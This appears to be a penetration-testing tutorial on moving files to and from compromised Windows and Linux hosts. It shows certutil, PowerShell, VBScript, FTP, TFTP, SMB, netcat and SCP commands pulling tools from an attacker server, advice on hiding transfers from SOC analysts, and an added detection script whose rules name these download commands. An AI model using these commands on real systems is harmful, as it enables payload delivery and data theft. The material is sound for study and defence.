File Transfer


(Almost) All The Ways to File Transfer


PenTest-duck
12 min read · Oct 6, 2019

File Transfer — a Crucial Post-Exploitation Procedure

Introduction
File Transfer is a crucial and, in most cases, inevitable step of Post-Exploitation.
You’ve successfully gained initial access on your target machine, and with file
transfers you can upload tools to the target to try and elevate your privileges,
exfiltrate sensitive data from the target back to your machine, or just move files
between the target and your machine.

Today, we’ll cover some of the popular (and not so popular) ways to transfer files
from our attacker machine (preferably Kali Linux) to a Windows or Linux target.
I’ll cover how to set up a server on the attacker machine and then show how the
target can download the file, and vice versa. At the end, we’ll cover the weaknesses
of plaintext file transfers and demonstrate some encrypted methods of file
transfer.

NOTE: Medium’s formatting makes “e”s that are enclosed in code blocks and are
italicised have a trailing space following it. To show an example: this "file " .
THERE IS NO SPACE AFTER THE “e”. However, there are some cases where there
is supposed to be a space after the “e”; you just have to use your senses :P

Easiest, Most Common File Transfer Method


HTTP
Arguably, the simplest and most convenient method of File Transfer is using
HTTP. You can easily set up a HTTP server on your attacker machine in a specific
directory that you want to be the root of the server, with just one command.

SimpleHTTPServer

SimpleHTTPServer Server

python -m SimpleHTTPServer [port] uses a module in Python called
SimpleHTTPServer, which, as the name suggests, starts up a HTTP server. It uses
port 8000 by default, but you can change that by specifying the port number at
the end.

There are only 2 very, very minor downsides of SimpleHTTPServer and that is the
fact that (1) when you Ctrl+C to stop the server, it gives you a mess of errors and
(2) this isn’t the shortest command to set up a HTTP server.

http.server
Http.server Server

python3 -m http.server [port] uses a lesser known module in Python 3 called
http.server, and it sets up a HTTP server, on port 8000 by default, just like
SimpleHTTPServer. But the advantages of http.server over SimpleHTTPServer
are:
1. You don’t get that mess of errors when you stop the server
2. It’s a shorter, easier to type command
3. Who doesn’t love Python3 ;)

Just one word of warning about HTTP servers is that whatever directory you run
the command in becomes the root directory of the HTTP server, which means
you won’t be able to serve files that sit outside that directory.

Apache
A longer method to start up a HTTP server, in the case that Python or the
modules are not available on your machine, is by using Apache.

First, move the file you want to transfer to the /var/www/html directory with
mv file /var/www/html/ and start the Apache2 service with service apache2 start .
We can verify that the server is indeed running and serving our file by browsing to
our file in a web browser.

Apache2 HTTP Server

On the Target…

On the target, for both Windows and Linux, if you have GUI access, you can
simply open up a web browser and download the files you want. For CLI ways to
download files from a HTTP server, check the Windows and Linux sections below
(namely certutil/powershell/vbscript for Windows and wget/curl for Linux).

Windows File Transfer


HTTP
Certutil.exe
Certutil is hands down probably the easiest way to file transfer to a Windows
machine. Certutil.exe is originally meant for certificate and CA management, but
is now abused by attackers as a method of file transfer.

Once you have set up your HTTP server with SimpleHTTPServer, http.server or
Apache, simply run this command on the target:
certutil -urlcache -split -f "http://ip-addr:port/file" [output-file]

Certutil HTTP Download

Powershell
Powershell is an advanced version of the standard cmd.exe with scripting
capabilities. It is installed by default in Windows 7 and 2008, and later versions.
You can use a Powershell one-liner to download a file from a HTTP server, like
this:
powershell -c (New-Object Net.WebClient).DownloadFile('http://ip-addr:port/file', 'output-file')

One thing to note: you MUST use single quotes for the URL and output file, and
using double quotes will not work (I can tell you this because I spent 10 minutes
trying to figure out why my Powershell command didn’t work).

Powershell HTTP Download

VBScript
VBScript, or Visual Basic Scripting Edition, is another language with which you
can download files. I generally don’t prefer using VBScript as you need to
individually insert tens of lines of commands into a file to execute (in reality you
would copy paste the commands all at once, but it’s still a hassle), but if your
target is Windows XP or 2003, you might consider using this method every now
and then.
Here’s the full list of commands (you can find a better-formatted version here):

echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET", strURL, False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs

To run our wget.vbs script, run cscript wget.vbs http://ip-addr:port/file output-file .

VBScript HTTP Download

FTP
Pyftpdlib
FTP is another common method of file transfer, and FTP clients are usually
installed by default on Windows machines. The Python module pyftpdlib allows
you to quickly set up an FTP server, hassle-free. You can install it using
sudo apt-get install python-pyftpdlib as shown below:

Pyftpdlib Installation

Once downloaded, simply set up an FTP server with python -m pyftpdlib [-p port] .
The default port pyftpdlib uses is port 2121. You can also append the
-w option to allow anonymous write, so that the target can anonymously upload
files to the attacker machine.

Pyftpdlib Server
Pure-ftpd
You can download pure-ftpd with sudo apt-get install pure-ftpd

Pure-ftpd Installation

To start the FTP server, run service pure-ftpd start .

Pure-ftpd Server

To verify that the service is indeed running, run service pure-ftpd status . To
close down the server, run service pure-ftpd stop .

On the Target…
Most of the time, the initial shell we gain on the target won’t be interactive,
which means running an interactive command that requires further input from
the user (e.g. a text editor or an FTP connection) won’t work properly, and can
crash the shell. But FTP requires user interaction, so how do we work around this?

The trick is to create a file with all the FTP commands we need, and run it all at
once. The file creation looks like this:

echo open ip-addr > ftp.txt
echo username >> ftp.txt
echo password >> ftp.txt
echo binary >> ftp.txt
echo GET file.exe >> ftp.txt
echo bye >> ftp.txt

FTP Commands File Creation

We are creating a connection to the attacking machine’s FTP server, with a
username and password (in my case, anonymous login is allowed), to enable
transfer of binary executable files, GET the executable file and close the
connection.

To run this whole file, use ftp -v -n -s:ftp.txt and you will see the commands
being automatically executed.

FTP File Download

TFTP
Atftpd
Atftpd allows a quick setup of a TFTP server in Kali Linux, with just a single
command atftpd --daemon --port 69 root-dir . You must specify the directory
that the TFTP server will use as the root. As a side note, TFTP uses UDP as its
transport layer protocol.

On the Target…
Windows XP and 2003 and earlier have a TFTP client pre-installed, whereas on
Windows 7 and 2008 and later the client needs to be installed separately. However,
there are plenty of use cases for TFTP file transfers.

To download/upload a file, use tftp -i ip-addr {GET | PUT} file .

TFTP Download

SMB
SMB is another convenient file transfer protocol, which is very common amongst
Windows environments. You can easily set up an SMB server with Impacket’s
smbserver.py program like this:
python /usr/share/doc/python-impacket/examples/smbserver.py share-name root-dir .

smbserver.py SMB Server

On the target, you can view the available shares on the SMB server with
net view \\ip-addr . To view the files available in the share, simply use
dir \\ip-addr\share-name .

SMB Server Enumeration

To actually download a file, use copy \\ip-addr\share-name\file out-file .

SMB Download
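The commands in this section are exactly what a defender should expect to see in process-creation telemetry when a host is being used this way. As an added example (not part of the original post), the following Python 3 script runs simple rules over constructed Windows process-creation events and flags the download primitives covered above: certutil -urlcache, the PowerShell WebClient one-liner, cscript running a .vbs with a URL argument, an ftp -s: batch session, a tftp -i transfer and a copy from a UNC path. The key=value event format, the host paths, IP addresses and user names are all made up for the example; the regexes are written against the command shapes shown on this page and would need tuning before use on real telemetry such as Sysmon Event ID 1 or Windows Security 4688 CommandLine fields.

```python
import re
from typing import Dict, List

# Constructed sample events in a hypothetical key=value export format.
# None of these paths, addresses or user names come from a real host.
SAMPLE_EVENTS = [
    'Image=C:\\Windows\\System32\\certutil.exe CommandLine="certutil -urlcache -split -f http://10.0.0.5:8000/nc.exe nc.exe" User=CORP\\alice',
    'Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe CommandLine="powershell -c (New-Object Net.WebClient).DownloadFile(\'http://10.0.0.5:8000/a.exe\', \'a.exe\')" User=CORP\\bob',
    'Image=C:\\Windows\\System32\\cscript.exe CommandLine="cscript wget.vbs http://10.0.0.5:8000/file out.exe" User=CORP\\bob',
    'Image=C:\\Windows\\System32\\ftp.exe CommandLine="ftp -v -n -s:ftp.txt" User=CORP\\svc',
    'Image=C:\\Windows\\System32\\tftp.exe CommandLine="tftp -i 10.0.0.5 GET file.exe" User=CORP\\svc',
    'Image=C:\\Windows\\System32\\certutil.exe CommandLine="certutil -verify cert.cer" User=CORP\\pki',
    'Image=C:\\Windows\\System32\\cmd.exe CommandLine="copy \\\\10.0.0.5\\share\\tool.exe C:\\Users\\Public\\tool.exe" User=CORP\\alice',
]

# (rule name, pattern applied to the CommandLine field). The patterns follow the
# command shapes shown in this section; legitimate certutil use (the -verify
# event above) does not match because no URL fetch is involved.
RULES = [
    ("certutil URL fetch",
     re.compile(r"certutil(\.exe)?\b.*-urlcache\b.*\b(https?|ftp)://", re.I)),
    ("PowerShell WebClient download",
     re.compile(r"net\.webclient\b.*\.download(file|string)\(", re.I)),
    ("cscript/wscript with URL argument",
     re.compile(r"\b[cw]script(\.exe)?\b.*\.vbs\b.*\b(https?|ftp)://", re.I)),
    ("ftp.exe scripted session",
     re.compile(r"\bftp(\.exe)?\b.*\s-s:", re.I)),
    ("tftp.exe transfer",
     re.compile(r"\btftp(\.exe)?\b.*\s-i\s+\S+\s+(get|put)\b", re.I)),
    ("copy from UNC path",
     re.compile(r"\bcopy\b\s+\\\\[^\s\\]+\\", re.I)),
]

# Parser for the constructed key=value line format (hypothetical, see above).
EVENT_RE = re.compile(
    r'Image=(?P<image>\S+)\s+CommandLine="(?P<cmd>.*)"\s+User=(?P<user>\S+)$')


def parse_event(line: str) -> Dict[str, str]:
    """Split one event line into its image, command line and user fields."""
    m = EVENT_RE.match(line)
    if not m:
        raise ValueError("unrecognised event line: %r" % line)
    return m.groupdict()


def match_rules(cmd: str) -> List[str]:
    """Return the names of every rule whose pattern matches the command line."""
    return [name for name, rx in RULES if rx.search(cmd)]


def scan_events(lines: List[str]) -> List[Dict[str, object]]:
    """Run all rules over the events and collect one alert per matching event."""
    alerts = []
    for line in lines:
        ev = parse_event(line)
        hits = match_rules(ev["cmd"])
        if hits:
            alerts.append({"user": ev["user"], "image": ev["image"],
                           "cmd": ev["cmd"], "rules": hits})
    return alerts


def alerts_by_user(alerts: List[Dict[str, object]]) -> Dict[str, int]:
    """Count alerts per user; several distinct download primitives from one
    account in a short window is a stronger signal than any single hit."""
    counts: Dict[str, int] = {}
    for a in alerts:
        counts[str(a["user"])] = counts.get(str(a["user"]), 0) + 1
    return counts


if __name__ == "__main__":
    for a in scan_events(SAMPLE_EVENTS):
        print("%-12s %-36s %s" % (a["user"], ", ".join(a["rules"]), a["cmd"]))
    print(alerts_by_user(scan_events(SAMPLE_EVENTS)))
```

Six of the seven constructed events are flagged; the certutil -verify event is not, which is the point of anchoring the certutil rule on -urlcache plus a URL rather than on the binary name alone.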

Linux File Transfer


Wget (HTTP/FTP)
Most Linux machines have the wget command pre-installed, so once you have set
up a HTTP server, you can download the file easily with
wget http://ip-addr[:port]/file [-O output-file] .

Wget HTTP Download

A lesser known usage of wget is its ability to download FTP files as well. To do
that, simply prepend ftp:// before the URL. If the FTP server needs credentials,
specify them with --ftp-user=username and --ftp-password=pass.

Wget FTP Download

One downside of this is that when it downloads an executable file, the file cannot
be executed. Normal FTP server connections have a binary command to allow
executable files to be preserved throughout the transfer, but wget doesn’t support
this.

Curl
Most Linux targets, and OSX machines, have the curl command available out-of-
the-box. Curl is similar to wget in that it provides an easy method of downloading
files from an HTTP server.

Curl HTTP Download

Netcat (Standard TCP/Manual HTTP)


Netcat, being the “swiss army knife of network hacking tools” it is, can also
provide an easy method of file transfers. You can read how Netcat can be
leveraged as a file transfer method using standard TCP connections in my other
post.

Netcat can also be used to manually download files from an HTTP server. You can
nc to a HTTP server and send a GET request for a file. The one-liner is
echo "GET /file HTTP/1.0" | nc -n ip-addr port > out-file && sed -i '1,7d' out-file .

Netcat HTTP Download


We redirect the download output to a file, and use sed to delete the first 7 lines of
the file. But why? Since we are redirecting the raw output to the file, the HTTP
GET response header is redirected as well, and if left untouched, can corrupt an
executable file.
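The sed trick only works because the server happens to send exactly seven lines (six headers plus the empty line) before the file; any extra header shifts the body and leaves stray bytes in front of the executable. As an added example that is not part of the original post, here is a Python 3 script that instead does what real HTTP clients do: it splits the response at the first empty line, checks the status code and Content-Length, and returns the body byte for byte. The response it parses is constructed inside the script (header values included) to resemble SimpleHTTPServer/http.server output, and the naive line-count stripper is included only to show how one extra header corrupts the file.

```python
import hashlib
from typing import Dict, Optional, Tuple


def split_http_response(raw: bytes) -> Tuple[str, Dict[str, str], bytes]:
    """Split a raw HTTP/1.x response into (status line, headers, body).

    The header block ends at the first empty line; everything after it is the
    body and is returned untouched, so binary payloads (which may themselves
    contain CRLFs) survive intact.
    """
    for sep in (b"\r\n\r\n", b"\n\n"):
        idx = raw.find(sep)
        if idx != -1:
            head, body = raw[:idx], raw[idx + len(sep):]
            break
    else:
        raise ValueError("no end-of-headers marker; incomplete or non-HTTP data")
    lines = head.replace(b"\r\n", b"\n").split(b"\n")
    status_line = lines[0].decode("latin-1")
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().decode("latin-1").lower()] = value.strip().decode("latin-1")
    return status_line, headers, body


def extract_body(raw: bytes) -> bytes:
    """Return the file content from a raw response, refusing anything that is
    not a complete 200 OK whose body length matches Content-Length."""
    status_line, headers, body = split_http_response(raw)
    parts = status_line.split(" ", 2)
    if len(parts) < 2 or not parts[0].startswith("HTTP/") or not parts[1].isdigit():
        raise ValueError("malformed status line: " + status_line)
    code = int(parts[1])
    if code != 200:
        raise ValueError("server answered %d; the body is an error page, not the file" % code)
    if "content-length" in headers:
        expected = int(headers["content-length"])
        if len(body) != expected:
            raise ValueError("body is %d bytes, Content-Length says %d" % (len(body), expected))
    return body


def safe_extract(raw: bytes) -> Optional[bytes]:
    """extract_body() that reports failure as None instead of raising."""
    try:
        return extract_body(raw)
    except ValueError:
        return None


def strip_first_n_lines(raw: bytes, n: int) -> bytes:
    """What `sed -i '1,7d'` does: drop the first n lines without looking at them."""
    pos = 0
    for _ in range(n):
        nl = raw.find(b"\n", pos)
        if nl == -1:
            return b""
        pos = nl + 1
    return raw[pos:]


def build_response(body: bytes, status: bytes = b"200 OK", extra_headers=()) -> bytes:
    """Constructed response shaped like Python's SimpleHTTPServer/http.server
    output (six headers, an empty line, then the body); all values are made up."""
    lines = [b"HTTP/1.0 " + status,
             b"Server: SimpleHTTP/0.6 Python/3.x",
             b"Date: Sun, 06 Oct 2019 10:00:00 GMT",
             b"Content-type: application/octet-stream",
             b"Content-Length: " + str(len(body)).encode("ascii"),
             b"Last-Modified: Sat, 05 Oct 2019 09:00:00 GMT"]
    lines.extend(extra_headers)
    return b"\r\n".join(lines) + b"\r\n\r\n" + body


def sha256_hex(data: bytes) -> str:
    """Hash to compare against the copy on the serving side after download."""
    return hashlib.sha256(data).hexdigest()


# Constructed stand-in for an executable: PE-style magic, a CRLF CRLF inside the
# data, then every byte value once.
FAKE_EXE = b"MZ\x90\x00\x03\x00\x00\x00\r\n\r\n\x00\xff" + bytes(range(256))

if __name__ == "__main__":
    raw = build_response(FAKE_EXE, extra_headers=[b"Connection: close"])
    print("parsed body intact:      ", extract_body(raw) == FAKE_EXE)
    print("7-line strip intact:     ", strip_first_n_lines(raw, 7) == FAKE_EXE)
    print("sha256 of extracted file:", sha256_hex(extract_body(raw)))
```

With the six-header response both approaches return the same bytes; add a seventh header and the line-count version hands back a file that starts with a stray CRLF, while the parser still returns it exactly and the hash comparison catches any remaining mismatch.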

Base 64 Encoding + Copy & Paste


Now here’s an interesting one. We won’t be actually transferring a file across a
network, but instead we will be copy-pasting executable files from our attacking
machine to the target. But how can we copy and paste executable files, which are
full of unprintable characters?

The trick is to first encode the file in Base 64. We can do this by using Python:
python -c 'print(__import__("base64").b64encode(open("file", "rb").read()).decode())' .
The trailing .decode() matters under Python 3, where b64encode returns bytes and
print() would otherwise wrap the output in b'...'.

Generating a Base 64 of the Executable

Then, on the target, we can copy and paste the string into a .txt file with
echo "string" > output.txt , and use base64 to decode the file, with
base64 -d output.txt > output-file .

Decoding the Base 64 File

If Python is available, you can also run
python -c 'import sys,base64; o=getattr(sys.stdout,"buffer",sys.stdout); o.write(base64.b64decode(open("string.txt").read()))' > out-file .
Writing the decoded bytes straight to stdout, rather than print()ing them, avoids the
trailing newline and, under Python 3, the b'...' wrapper that would corrupt the output file.
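The copy-and-paste method fails in quiet ways: the encoded text gets wrapped or truncated by a terminal, a b'...' wrapper from a Python 3 print() ends up in the pasted string, or a stray character lands in the middle and a lenient decoder silently drops it. The following Python 3 script is an added example (not part of the original post) that demonstrates the round trip with those failure modes handled: it wraps the encoded text to a fixed width, tolerates wrapped lines, a pasted b'...' wrapper and lost padding when decoding, rejects characters outside the Base64 alphabet instead of guessing, and compares SHA-256 hashes of both ends so a mangled paste is detected rather than executed. The sample file bytes are constructed.

```python
import base64
import binascii
import hashlib
import re

# Constructed stand-in for an executable: PE-style magic plus every byte value twice.
SAMPLE_FILE = b"MZ\x90\x00" + bytes(range(256)) * 2


def encode_for_paste(data: bytes, width: int = 76) -> str:
    """Base64-encode and wrap to `width` columns; very long single lines are
    what terminals and clipboards tend to mangle."""
    text = base64.b64encode(data).decode("ascii")
    return "\n".join(text[i:i + width] for i in range(0, len(text), width))


def decode_pasted(text: str) -> bytes:
    """Decode Base64 as it arrives after a copy-paste.

    Raises binascii.Error on anything that is not clean Base64, rather than
    silently discarding bad characters the way the default decoder does.
    """
    s = text.strip()
    # Python 3's print(b64encode(...)) wraps the text as b'...'; unwrap it.
    if len(s) >= 3 and s[0] == "b" and s[1] in "'\"" and s[-1] == s[1]:
        s = s[2:-1]
    s = re.sub(r"\s+", "", s)                  # line wrapping and stray spaces
    s += "=" * (-len(s) % 4)                   # padding clipped off the end
    return base64.b64decode(s, validate=True)  # validate=True: no silent dropping


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def verify_transfer(original: bytes, pasted_text: str) -> bool:
    """True only if the pasted text decodes to exactly the original bytes.

    In practice the hash of `original` is computed on the sending side and the
    decoded hash on the receiving side; here both halves run in one process.
    """
    try:
        decoded = decode_pasted(pasted_text)
    except (binascii.Error, ValueError):
        return False
    return sha256_hex(decoded) == sha256_hex(original)


if __name__ == "__main__":
    encoded = encode_for_paste(SAMPLE_FILE)
    print("encoded lines:", len(encoded.splitlines()))
    print("clean paste verifies:    ", verify_transfer(SAMPLE_FILE, encoded))
    print("b'...' wrapper verifies: ", verify_transfer(SAMPLE_FILE, "b'" + encoded + "'"))
    print("truncated paste verifies:", verify_transfer(SAMPLE_FILE, encoded[:-10]))
    print("corrupted paste verifies:", verify_transfer(SAMPLE_FILE, encoded.replace("A", "!", 1)))
    # Writing the result: open(path, "wb").write(decode_pasted(encoded)) keeps
    # the bytes exact, which print() never does.
```

The truncated case is the instructive one: after re-padding it still decodes without error and produces a slightly shorter file, so only the hash comparison reveals that the transfer was incomplete.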

Encrypted & Secure File Transfer


Problems with Plaintext & Benefits of Encrypted File Transfer
The main problem with plaintext file transfers is … that it communicates in
plaintext. Why is this bad? Because anyone can sniff the network and see the file
that is being introduced or exfiltrated, which means certain people like SOC
analysts can detect and see exactly what you are smuggling into the network
and/or out from the network.

Here’s a Wireshark capture of a curl http://192.168.1.2:8000/filetransfer.me to
drive the point home.

Plaintext HTTP Download Capture

Following the HTTP stream shows us the HTTP GET request that was sent (shows
the sending host and user agent [curl]), the file that was requested and the
server’s response. As you can see, network sniffers can find out a lot about the
plaintext communication between you and your target. This is why encrypted
communication is important.

Encrypted SCP Download Capture

In this case, we’ve used the Secure Copy Protocol (SCP) to download a file over
SSH. As you can see, you cannot identify what file the attacker tried to upload,
nor its contents — you only see a jumbled mess. This is a much more secure way
to download/upload files to/from the target. Now let’s take a look at how we can
actually achieve encrypted file transfers.

How to Perform Secure File Transfer

The first, and easier, method is to use Ncat. Ncat can create a secure,
encrypted connection over SSL/TLS. You can set up a listener on the target with
ncat -nvlp port --ssl > out-file and connect to the listener from the attacking
machine with ncat -nv target-ip port --ssl < file-to-send .

Ncat SSL/TLS Download

The second method is to use the Secure Copy Protocol, or SCP, which uses SSH to
securely transfer files. You can start the SSH server easily on your Kali Linux with
service ssh start .

On the target, we need to create a file, line by line, which will enter the SSH
password in, and download the remote file. The only reason that a one-liner
doesn’t work is because SCP prompts the user for a password, and simply echoing
the password and piping it to the command won’t work. The list of commands to
build the file looks like this:

echo '#!/usr/bin/expect' > scp.exp
echo 'spawn scp username@ip-addr:/path-to-file out-file' >> scp.exp
echo 'set pass "password"' >> scp.exp
echo 'expect {' >> scp.exp
echo 'password: {send "$pass\r"; exp_continue}' >> scp.exp
echo '}' >> scp.exp

To run this file, use expect scp.exp and securely download the file you want.

You may need to create a new user for SSH to log into; if so, you can use the
adduser username command and follow the prompt to set up a new user.

Important note: you MUST use single quotes to surround the lines, as using
double quotes will overlap with the double quotes that are included within the
line, and will cause an issue with the first line.

SCP Download

Further Digging
Other File Transfer Methods: https://isroot.nl/2018/07/09/post-exploitation-file-transfers-on-windows-the-manual-way/
Certutil.exe: https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil
Passing the password to SCP: https://stackoverflow.com/questions/50096/how-to-pass-password-to-scp
